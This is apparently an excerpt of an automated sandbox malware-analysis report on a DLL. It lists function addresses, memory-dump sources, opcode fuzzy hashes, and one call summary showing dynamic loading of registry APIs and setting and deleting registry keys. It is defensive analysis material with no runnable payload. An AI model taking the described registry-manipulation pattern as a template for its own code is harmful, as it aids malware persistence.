                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3164cc545147bd6fcc36361def7e2a971fd9603e6a70d7ac7ed952a751d142aa
                                                          • Instruction ID: 99b1dfc0eadf8ce5e7ea059f80025304a01d0b16e7590e3691273424f6849c3b
                                                          • Opcode Fuzzy Hash: 3164cc545147bd6fcc36361def7e2a971fd9603e6a70d7ac7ed952a751d142aa
                                                          • Instruction Fuzzy Hash: 47E1E6B2A083554FD318CF28C89125AFBE1FBC4340F16866DE8D6DB352D678D946CB89
                                                          Function 1005AEA0 Relevance: .4, Instructions: 379COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
                                                          • Instruction ID: d9b1ff911830af0539c7349bf08e3b2d9740b495c4966d40e324d81a2e3ecd1b
                                                          • Opcode Fuzzy Hash: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
                                                          • Instruction Fuzzy Hash: 52F1BEB65096418FC309CF18D4989E2BBE5EF98310B1F42FDC4499B362D332E985CB91
                                                          Function 100308D0 Relevance: .4, Instructions: 361COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2687faa37309abc548b5ff328fe7a62011fc3d30ac3d746e604706c2c85b3cbe
                                                          • Instruction ID: 7bb6ed843fccb1d171a269f829f0da8c3387a7479521bb1172319b2c54a59b23
                                                          • Opcode Fuzzy Hash: 2687faa37309abc548b5ff328fe7a62011fc3d30ac3d746e604706c2c85b3cbe
                                                          • Instruction Fuzzy Hash: 60D155B5A057468FC314CF09C890A5AF7E1FFC8354F158A2EE8999B311D730E946CB92
                                                          Function 1003E490 Relevance: .3, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80c568206ee772c262ef29b3cb3411df1fba831bc70dbbdd959477f18782bbad
                                                          • Instruction ID: 191fb6512ce3fe81ac62e8b205ff347e08eb9b5354047abb2973186291256276
                                                          • Opcode Fuzzy Hash: 80c568206ee772c262ef29b3cb3411df1fba831bc70dbbdd959477f18782bbad
                                                          • Instruction Fuzzy Hash: 52D1AE64926B0296D716CF38D082436B3A2FFF27147A4C75ED886B715AFB30E895C381
                                                          Function 1007E580 Relevance: .3, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae47193ef76f41e1c0a7737ddabf261204965994b2c23791b9a9f3304ea2af50
                                                          • Instruction ID: 45ee19a05268406ed62398bc3a28ccd0e4e8b6f529426f227ce502e31306181e
                                                          • Opcode Fuzzy Hash: ae47193ef76f41e1c0a7737ddabf261204965994b2c23791b9a9f3304ea2af50
                                                          • Instruction Fuzzy Hash: 3BC135716087468FD71CCF19C89156AFBE2FFC8704F048A2EE59A87354EB34A914CB89
                                                          Function 1005B420 Relevance: .3, Instructions: 297COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44531fdb7ad762606b8c0ed8b22239f60f764cef16d5b4e10ce9907491eaaf73
                                                          • Instruction ID: 1cefddefc1273a83d4783cd2495db2e7edfb8caec8dc97b4bcf5608fb9fa9477
                                                          • Opcode Fuzzy Hash: 44531fdb7ad762606b8c0ed8b22239f60f764cef16d5b4e10ce9907491eaaf73
                                                          • Instruction Fuzzy Hash: 8DD18A756092518FC319CF28E8D88E67BE5FF98710B1E42F8C9898B323D731A985CB55
                                                          Function 1003B210 Relevance: .3, Instructions: 292COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e36b668c6f7f275d4e3c1909ff9ce4881944ec2a47434caefc73e7e0d96a4ec0
                                                          • Instruction ID: 721eaa63ce6458851d8aa1b9dc4c03e48d6a588ee79b546b769e2eb3cd3e4e7c
                                                          • Opcode Fuzzy Hash: e36b668c6f7f275d4e3c1909ff9ce4881944ec2a47434caefc73e7e0d96a4ec0
                                                          • Instruction Fuzzy Hash: 56C13E3560D3828FC308CF69C49055AFBE2BFCA208F49D97DE9D98B312D671A919CB45
                                                          Function 10035697 Relevance: .3, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 380346d83fdc543ebc22177e3de29bc30f0f136880a3c99924b68710931819b8
                                                          • Instruction ID: ac40b97b19cf350deb4381199cebd45df556241ac8ef125ecfdd14d8ce777ac4
                                                          • Opcode Fuzzy Hash: 380346d83fdc543ebc22177e3de29bc30f0f136880a3c99924b68710931819b8
                                                          • Instruction Fuzzy Hash: 3CA1B334A087968FC709CF29848031ABBE2FFD9616F24C66DD8A58F299E771C905C781
                                                          Function 1003E470 Relevance: .3, Instructions: 269COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ba32ef62104ad4fa989df10cd095480fe71a6d544f4596f173a80f44f9302ff
                                                          • Instruction ID: 5f98526eac24df5b1521ed8c3c60a8dea648e96a9abcffbfabeff445296a397c
                                                          • Opcode Fuzzy Hash: 5ba32ef62104ad4fa989df10cd095480fe71a6d544f4596f173a80f44f9302ff
                                                          • Instruction Fuzzy Hash: 4EC18BA4A2AF0596D7168F38D482536B3A1FFF17147A4C74AD8C6B715EFB20E4A1D280
                                                          Function 10059900 Relevance: .3, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87cd360eeabfb3d2a53af9d4dc92188b2830e60fc760d83bb67fb1035d8072f3
                                                          • Instruction ID: 8d182b711f86b2590d44b9e897d1d1c98bcbef0953a52f6730e8bedf5447d214
                                                          • Opcode Fuzzy Hash: 87cd360eeabfb3d2a53af9d4dc92188b2830e60fc760d83bb67fb1035d8072f3
                                                          • Instruction Fuzzy Hash: F6916D32604B428FD729CF29C8914ABB7E2EF86344B69892DD5D787B11E731B849CB41
                                                          Function 10059DB0 Relevance: .3, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
                                                          • Instruction ID: e70820d266a8dfc3c891c9c4e497ac63b67ceedcd589d3e7af91b45e671c8c89
                                                          • Opcode Fuzzy Hash: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
                                                          • Instruction Fuzzy Hash: FB718533755A8207E71CCE3E8C612BAABD38FC621432ED87E94DAC7756EC79D41A5204
                                                          Function 100932B0 Relevance: .3, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 526be129fac9b37650431431b4705c90b65478cca87c7015f6ccda0600b84cbe
                                                          • Instruction ID: ada8525b159845f1390d658ad0e5d9a57e75d79f439640740ceeb097215e61c0
                                                          • Opcode Fuzzy Hash: 526be129fac9b37650431431b4705c90b65478cca87c7015f6ccda0600b84cbe
                                                          • Instruction Fuzzy Hash: 3A9149756047059FD358CF28C881BABB7EAEBC8300F15992DF99A87340EA30F908CB51
                                                          Function 1007E2D0 Relevance: .2, Instructions: 243COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 738e318655c3b82810aac9401e85110b9a511d01cb2779d768fdfb1b57bd8194
                                                          • Instruction ID: 65d720aa07cd928deccfaa74b3b71696debaa1d146457c02c1e58d8034247ce2
                                                          • Opcode Fuzzy Hash: 738e318655c3b82810aac9401e85110b9a511d01cb2779d768fdfb1b57bd8194
                                                          • Instruction Fuzzy Hash: C8914A716093818FC318CF6DC89056AFBE2FFCE304F19863EE589C7365DA7599068A46
                                                          Function 1005BAB0 Relevance: .2, Instructions: 220COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 361d593a6597ca170d4028ccc48b8ee29c1db73e1bb6d68cc95f9e1a891fcec8
                                                          • Instruction ID: 394e96dab5a0ad22cad07a8418f847d0fe22322e10ef68398779eb1422000efd
                                                          • Opcode Fuzzy Hash: 361d593a6597ca170d4028ccc48b8ee29c1db73e1bb6d68cc95f9e1a891fcec8
                                                          • Instruction Fuzzy Hash: 4E81BF327195A64BE708CF29DCE053BB7A3EB8D340F19883DC686D7356C931A91AC760
                                                          Function 100A8230 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 763eac6b6b42709351b1268c3bfac75d101506b380c3a22d1c78b889bc5400ed
                                                          • Instruction ID: 4e5fd15620c05232e311bf08b0a4888acbdfcfc8b05760d64ecdd7d941a19f93
                                                          • Opcode Fuzzy Hash: 763eac6b6b42709351b1268c3bfac75d101506b380c3a22d1c78b889bc5400ed
                                                          • Instruction Fuzzy Hash: 67219373BF4E1B0EE344A9FCDC4A7A135C1D3A4715F198E38A119C72C0F5ACCA885250
                                                          Function 10025E80 Relevance: 315.5, APIs: 3, Strings: 207, Instructions: 466sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • atoi.MSVCRT(?), ref: 10025E9A
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                            • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                            • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • atoi.MSVCRT(?,80000002,?,?,00000004,?,00000000,00000000,00000000), ref: 10026908
                                                            • Part of subcall function 10014CA0: RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                          • Sleep.KERNEL32(000005DC), ref: 10026933
                                                            • Part of subcall function 10014CA0: RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
